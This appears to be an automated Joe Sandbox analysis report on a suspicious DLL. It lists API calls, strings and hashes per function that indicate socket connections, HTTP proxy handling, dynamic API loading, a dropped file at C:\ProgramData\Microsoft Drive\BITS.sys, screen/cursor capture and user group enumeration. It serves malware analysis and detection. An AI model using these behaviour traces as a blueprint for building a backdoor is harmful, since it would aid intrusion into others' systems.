                                                  • Opcode Fuzzy Hash: 4072f59da86136a8181d21f34bb8e7e131716998d916dfe5853bc9eb5e6c99c2
                                                  • Instruction Fuzzy Hash: 2401DB395042246FE710EB64AC89AEB3798FF44701F484229FD0ED7200EB759904C6F1
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(1012C4C8), ref: 10022E6A
                                                  • LeaveCriticalSection.KERNEL32(1012C4C8), ref: 10022E82
                                                    • Part of subcall function 10022D10: _strnicmp.MSVCRT ref: 10022D24
                                                  • send.WS2_32(?,HTTP/1.0 200 OK,?,00000000), ref: 10022F1E
                                                  • send.WS2_32(?,?,00000000,00000000), ref: 10022F94
                                                  • CreateThread.KERNEL32(00000000,00000000,10023F60,?,00000000,?), ref: 10022FBC
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,00000000), ref: 10022FC9
                                                    • Part of subcall function 10022C80: atoi.MSVCRT(?), ref: 10022CB9
                                                    • Part of subcall function 100234D0: htons.WS2_32 ref: 100234F3
                                                    • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023509
                                                    • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023527
                                                    • Part of subcall function 100234D0: socket.WS2_32(00000002,00000001,00000006), ref: 10023533
                                                    • Part of subcall function 100234D0: setsockopt.WS2_32 ref: 1002355E
                                                    • Part of subcall function 100234D0: connect.WS2_32(?,?,00000010), ref: 1002356E
                                                    • Part of subcall function 100234D0: closesocket.WS2_32 ref: 1002357C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSectioninet_addrsend$CreateEnterLeaveObjectSingleThreadWait_strnicmpatoiclosesocketconnecthtonssetsockoptsocket
                                                  • String ID: HTTP/1.0 200 OK
                                                  • API String ID: 599367761-2989790534
                                                  • Opcode ID: 1504ab6db776c2b976dbfc0d722819826677dc24a5412ddc79deb8b4ae1d556b
                                                  • Instruction ID: d01c3d8d1e42ec9e78ad2dd7fcbc3bb7af0e74a76ee1a4f2da6276a6e3bbdd91
                                                  • Opcode Fuzzy Hash: 1504ab6db776c2b976dbfc0d722819826677dc24a5412ddc79deb8b4ae1d556b
                                                  • Instruction Fuzzy Hash: 4841E135604205ABD760DBA4ED84FAB77E8EB84360F504B39F948D3284DA34ED45CBA2
                                                  APIs
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1002C0AA
                                                  • lstrlenA.KERNEL32 ref: 1002C0C9
                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 1002C0D2
                                                  • CloseHandle.KERNEL32(00000000), ref: 1002C0D9
                                                    • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                    • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                    • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                    • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFileLibraryLoadProc$CloseCreateHandleWritelstrlen
                                                  • String ID: BITS$C:\ProgramData\Microsoft Drive\BITS.sys$TGByte\Setup
                                                  • API String ID: 46210954-946259135
                                                  • Opcode ID: c1bc2c2478201faed0d3ea6f926608c4dbf94378b606a7168d56eee6f7a0415f
                                                  • Instruction ID: 82df5fe4f076fdc460b0368929330cb59a7ddbd3ad64e14f566ba4719a397f5f
                                                  • Opcode Fuzzy Hash: c1bc2c2478201faed0d3ea6f926608c4dbf94378b606a7168d56eee6f7a0415f
                                                  • Instruction Fuzzy Hash: 15115175104310AFE310DF18DC98BEBBBE9FB89710F444929FA48A7291DB745909CBA2
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,10098376,000000FF), ref: 100124D5
                                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 100124E3
                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,10098376,000000FF), ref: 10012522
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,10098376,000000FF), ref: 1001252D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressCriticalDeleteFreeLoadProcSection
                                                  • String ID: closesocket$ws2_32.dll$Wu
                                                  • API String ID: 1041861973-2959226248
                                                  • Opcode ID: 7ec5b394c5dd60fd7d873c2236bf67511227bc33ef3d5c31afae368c8e1ea57f
                                                  • Instruction ID: 84a0c60808f6a2c03e40c6969a83a2f887d69962a4d8d2a11b52e44a2cc86ffd
                                                  • Opcode Fuzzy Hash: 7ec5b394c5dd60fd7d873c2236bf67511227bc33ef3d5c31afae368c8e1ea57f
                                                  • Instruction Fuzzy Hash: B0119EB55047459BC300DF28DC44B8AFBE8FF44760F400B29F86993390D77899548AA1
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(user32.dll), ref: 1000BB2D
                                                  • GetProcAddress.KERNEL32(00000000,GetWindowTextA), ref: 1000BB3B
                                                  • strstr.MSVCRT ref: 1000BB74
                                                  • FreeLibrary.KERNEL32(00000000), ref: 1000BB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProcstrstr
                                                  • String ID: GetWindowTextA$user32.dll$Wu
                                                  • API String ID: 1147820842-3776163548
                                                  • Opcode ID: 04f329c70a298f015c30de5bf77217c16f7adc99adbac1e98e914c917f6df95c
                                                  • Instruction ID: 8c68ac7e4c2aeca86d41d5b223ca0fc2938b7ae066b174a2482fdab962876872
                                                  • Opcode Fuzzy Hash: 04f329c70a298f015c30de5bf77217c16f7adc99adbac1e98e914c917f6df95c
                                                  • Instruction Fuzzy Hash: 2DF09C395006107BF321DB2CCCC4BEB7BE8FFC5351F044924F94996254DBB99649C6A1
                                                  APIs
                                                    • Part of subcall function 10012560: EnterCriticalSection.KERNEL32(?,?,?,1001246B,?,00000001,?,?,?,00000000,100988A8,000000FF,1000EB8A), ref: 1001256B
                                                    • Part of subcall function 10012560: LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,100988A8,000000FF,1000EB8A), ref: 10012585
                                                  • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 100125F6
                                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 10012604
                                                  • FreeLibrary.KERNEL32(00000000), ref: 10012619
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
                                                  • String ID: 5$closesocket$ws2_32.dll$Wu
                                                  • API String ID: 2819327233-518943454
                                                  • Opcode ID: 27ca07e9f078f202f3a329561812890b0cb509a05fc093fdfdbdbb04bf2e6fa4
                                                  • Instruction ID: 2761632c92e94d1a980d48baebd45236be465951dd9527d8c45c8e1131a91282
                                                  • Opcode Fuzzy Hash: 27ca07e9f078f202f3a329561812890b0cb509a05fc093fdfdbdbb04bf2e6fa4
                                                  • Instruction Fuzzy Hash: 83F0A77A100A116BD301EF1C9C84DDB77A8FF84752F440519FE4496201DB34E919C7B2
                                                  APIs
                                                  • _CxxThrowException.MSVCRT(?,100F59A0), ref: 10004DC3
                                                  • #823.MFC42(10004C7C,?,00000004,00000000,00000004,10004C8B,00000004,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10004E37
                                                  • #823.MFC42(00000000,?,?,?,00000000,10097CF0,000000FF,753523A0,10004C8B,?,00000000), ref: 10004E48
                                                  • #825.MFC42(00000000,00000000,?,?,?), ref: 10004EAE
                                                  • #825.MFC42(00000000,00000000,00000000,?,?,?), ref: 10004EB4
                                                  • _CxxThrowException.MSVCRT(?), ref: 10004ED1
                                                  • #825.MFC42(?,?,?,?,?,00000000,10097CF0,000000FF,753523A0,10004C8B,?,00000000), ref: 10004EDE
                                                  • #825.MFC42(10097CF0,?,?,?,?,00000000,10097CF0,000000FF,753523A0,10004C8B,?,00000000), ref: 10004EEE
                                                    • Part of subcall function 10004FA0: _ftol.MSVCRT ref: 10004FDF
                                                    • Part of subcall function 10004FA0: #823.MFC42(00000000), ref: 10004FE9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #825$#823$ExceptionThrow$_ftol
                                                  • String ID:
                                                  • API String ID: 3722084872-0
                                                  • Opcode ID: c76f4588f4861e8b0e5033ec5df18216b91fc0f614261ac88326526c7a5f0dfa
                                                  • Instruction ID: a565fb7e3d51c96f679dbc9a240e4393d41c51425d2560a9ab3a27c4c36f4040
                                                  • Opcode Fuzzy Hash: c76f4588f4861e8b0e5033ec5df18216b91fc0f614261ac88326526c7a5f0dfa
                                                  • Instruction Fuzzy Hash: 9F51B4B5A002099BEF00DF64C881FEEB7B9EF48680F014029F905AB345DF34B9058B95
                                                  APIs
                                                    • Part of subcall function 100193B0: ReleaseDC.USER32(?,?), ref: 100193CA
                                                    • Part of subcall function 100193B0: GetDesktopWindow.USER32 ref: 100193D0
                                                    • Part of subcall function 100193B0: GetDC.USER32(00000000), ref: 100193DD
                                                  • GetCursorPos.USER32(?), ref: 10018E2A
                                                  • GetCursorInfo.USER32(?), ref: 10018E4B
                                                  • DestroyCursor.USER32(?), ref: 10018E74
                                                  • GetTickCount.KERNEL32 ref: 10018F68
                                                  • Sleep.KERNEL32(00000001), ref: 10018F7D
                                                  • GetTickCount.KERNEL32 ref: 10018F7F
                                                  • GetTickCount.KERNEL32 ref: 10018F8C
                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 10018F90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountCursorTick$DesktopDestroyExchangeInfoInterlockedReleaseSleepWindow
                                                  • String ID:
                                                  • API String ID: 3294368536-0
                                                  • Opcode ID: 4a7df8d60600de043c0bb7cfed485230d8fbc3df118ce4c8ede63eb6f3667606
                                                  • Instruction ID: ff4b4ef49c98019615c2a65cfc990f2aa669ceed5be905bf5dcedc78d86ebb80
                                                  • Opcode Fuzzy Hash: 4a7df8d60600de043c0bb7cfed485230d8fbc3df118ce4c8ede63eb6f3667606
                                                  • Instruction Fuzzy Hash: 595181756007049FD724DF28C884A6AB3E6FFC8350B544A2DF586CB651D730FA86CB61
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 10015071
                                                  • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000,?,00000000,000F003F,?), ref: 100150A7
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,00000000,000F003F,?), ref: 100150E6
                                                  • #823.MFC42(?,?,?,?,00000000,000F003F,?), ref: 10015123
                                                  • RegEnumKeyExA.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 10015178
                                                  • #825.MFC42(00000000), ref: 100151BD
                                                  • RegCloseKey.ADVAPI32(?), ref: 100151CA
                                                  • LocalReAlloc.KERNEL32(?,?,00000042), ref: 100151D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocLocal$#823#825CloseEnumInfoOpenQuery
                                                  • String ID:
                                                  • API String ID: 601778281-0
                                                  • Opcode ID: 85e55e9e4f02421b4db1b883a4024d4ed32ff9865cba92a3e170d1b376d56402
                                                  • Instruction ID: 4b4c04f4024f2eeb250a51fee2cf116552961625396d2f58dbf3a56bd6632ff2
                                                  • Opcode Fuzzy Hash: 85e55e9e4f02421b4db1b883a4024d4ed32ff9865cba92a3e170d1b376d56402
                                                  • Instruction Fuzzy Hash: FC517171604305AFD714DF28CC91B6BB7E9FB88610F584A2DF949DB380D635ED058BA2
                                                  APIs
                                                  • ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A40F
                                                  • ?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A417
                                                  • memmove.MSVCRT(3B4208C4,?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A439
                                                  • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 1000A44B
                                                  • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 1000A458
                                                  • ?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?,?,00000000,00000065), ref: 1000A460
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A497
                                                  • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(3B4208C4,00000001,?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?), ref: 1000A4D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@memmove
                                                  • String ID:
                                                  • API String ID: 1074130261-0
                                                  • Opcode ID: 9c78330a7592489e721474567922780b083d31e010480504787a7ba47f8834b6
                                                  • Instruction ID: 8f937d4beb23756cef0cc620a4d7fe7e7cbc97e07a2ad92db45a8aecb1b163fa
                                                  • Opcode Fuzzy Hash: 9c78330a7592489e721474567922780b083d31e010480504787a7ba47f8834b6
                                                  • Instruction Fuzzy Hash: B141D1396407549FD710CF19C8C869ABBE5FBC9BA0F44862EEC5A87351C7759D40CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _strnicmp
                                                  • String ID: CONNECT $GET $HEAD $POST
                                                  • API String ID: 2635805826-4031508290
                                                  • Opcode ID: 8e0d9e5e09227768d0ec5b33733962aa17a28a7267a097da5aeef95a31cf02b6
                                                  • Instruction ID: fa460915d63ec4b934f80117152b8bd5556e36b8001ea6058181aeb353eaf165
                                                  • Opcode Fuzzy Hash: 8e0d9e5e09227768d0ec5b33733962aa17a28a7267a097da5aeef95a31cf02b6
                                                  • Instruction Fuzzy Hash: 66015E35300651A7E700EA6DFC04BCE73D8EFC5715F860466FA40DB294E7B899458B96
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: sprintf$floor
                                                  • String ID: %.0f
                                                  • API String ID: 389794084-4293663076
                                                  • Opcode ID: cb3f7aaaf6b266179aa8dd0ee4d912ea5967b7a82becc2bba026ec5a4ef99637
                                                  • Instruction ID: a274ceac6ce3522e1593489d29bd3f77ae1b15863641420014f16e45a4b04ce6
                                                  • Opcode Fuzzy Hash: cb3f7aaaf6b266179aa8dd0ee4d912ea5967b7a82becc2bba026ec5a4ef99637
                                                  • Instruction Fuzzy Hash: F0417CB1A04615A7F3028B54ED9879777ACFFC23D6F044261FE8892294DB21D974C7E2
                                                  APIs
                                                  • mbstowcs.MSVCRT ref: 1002533C
                                                  • NetUserGetLocalGroups.NETAPI32(00000000,?,00000000,00000001,?,000000FF,?,?,000000FF,75570440,1012C7F0), ref: 10025362
                                                  • wcslen.MSVCRT ref: 100253A2
                                                  • malloc.MSVCRT ref: 100253AA
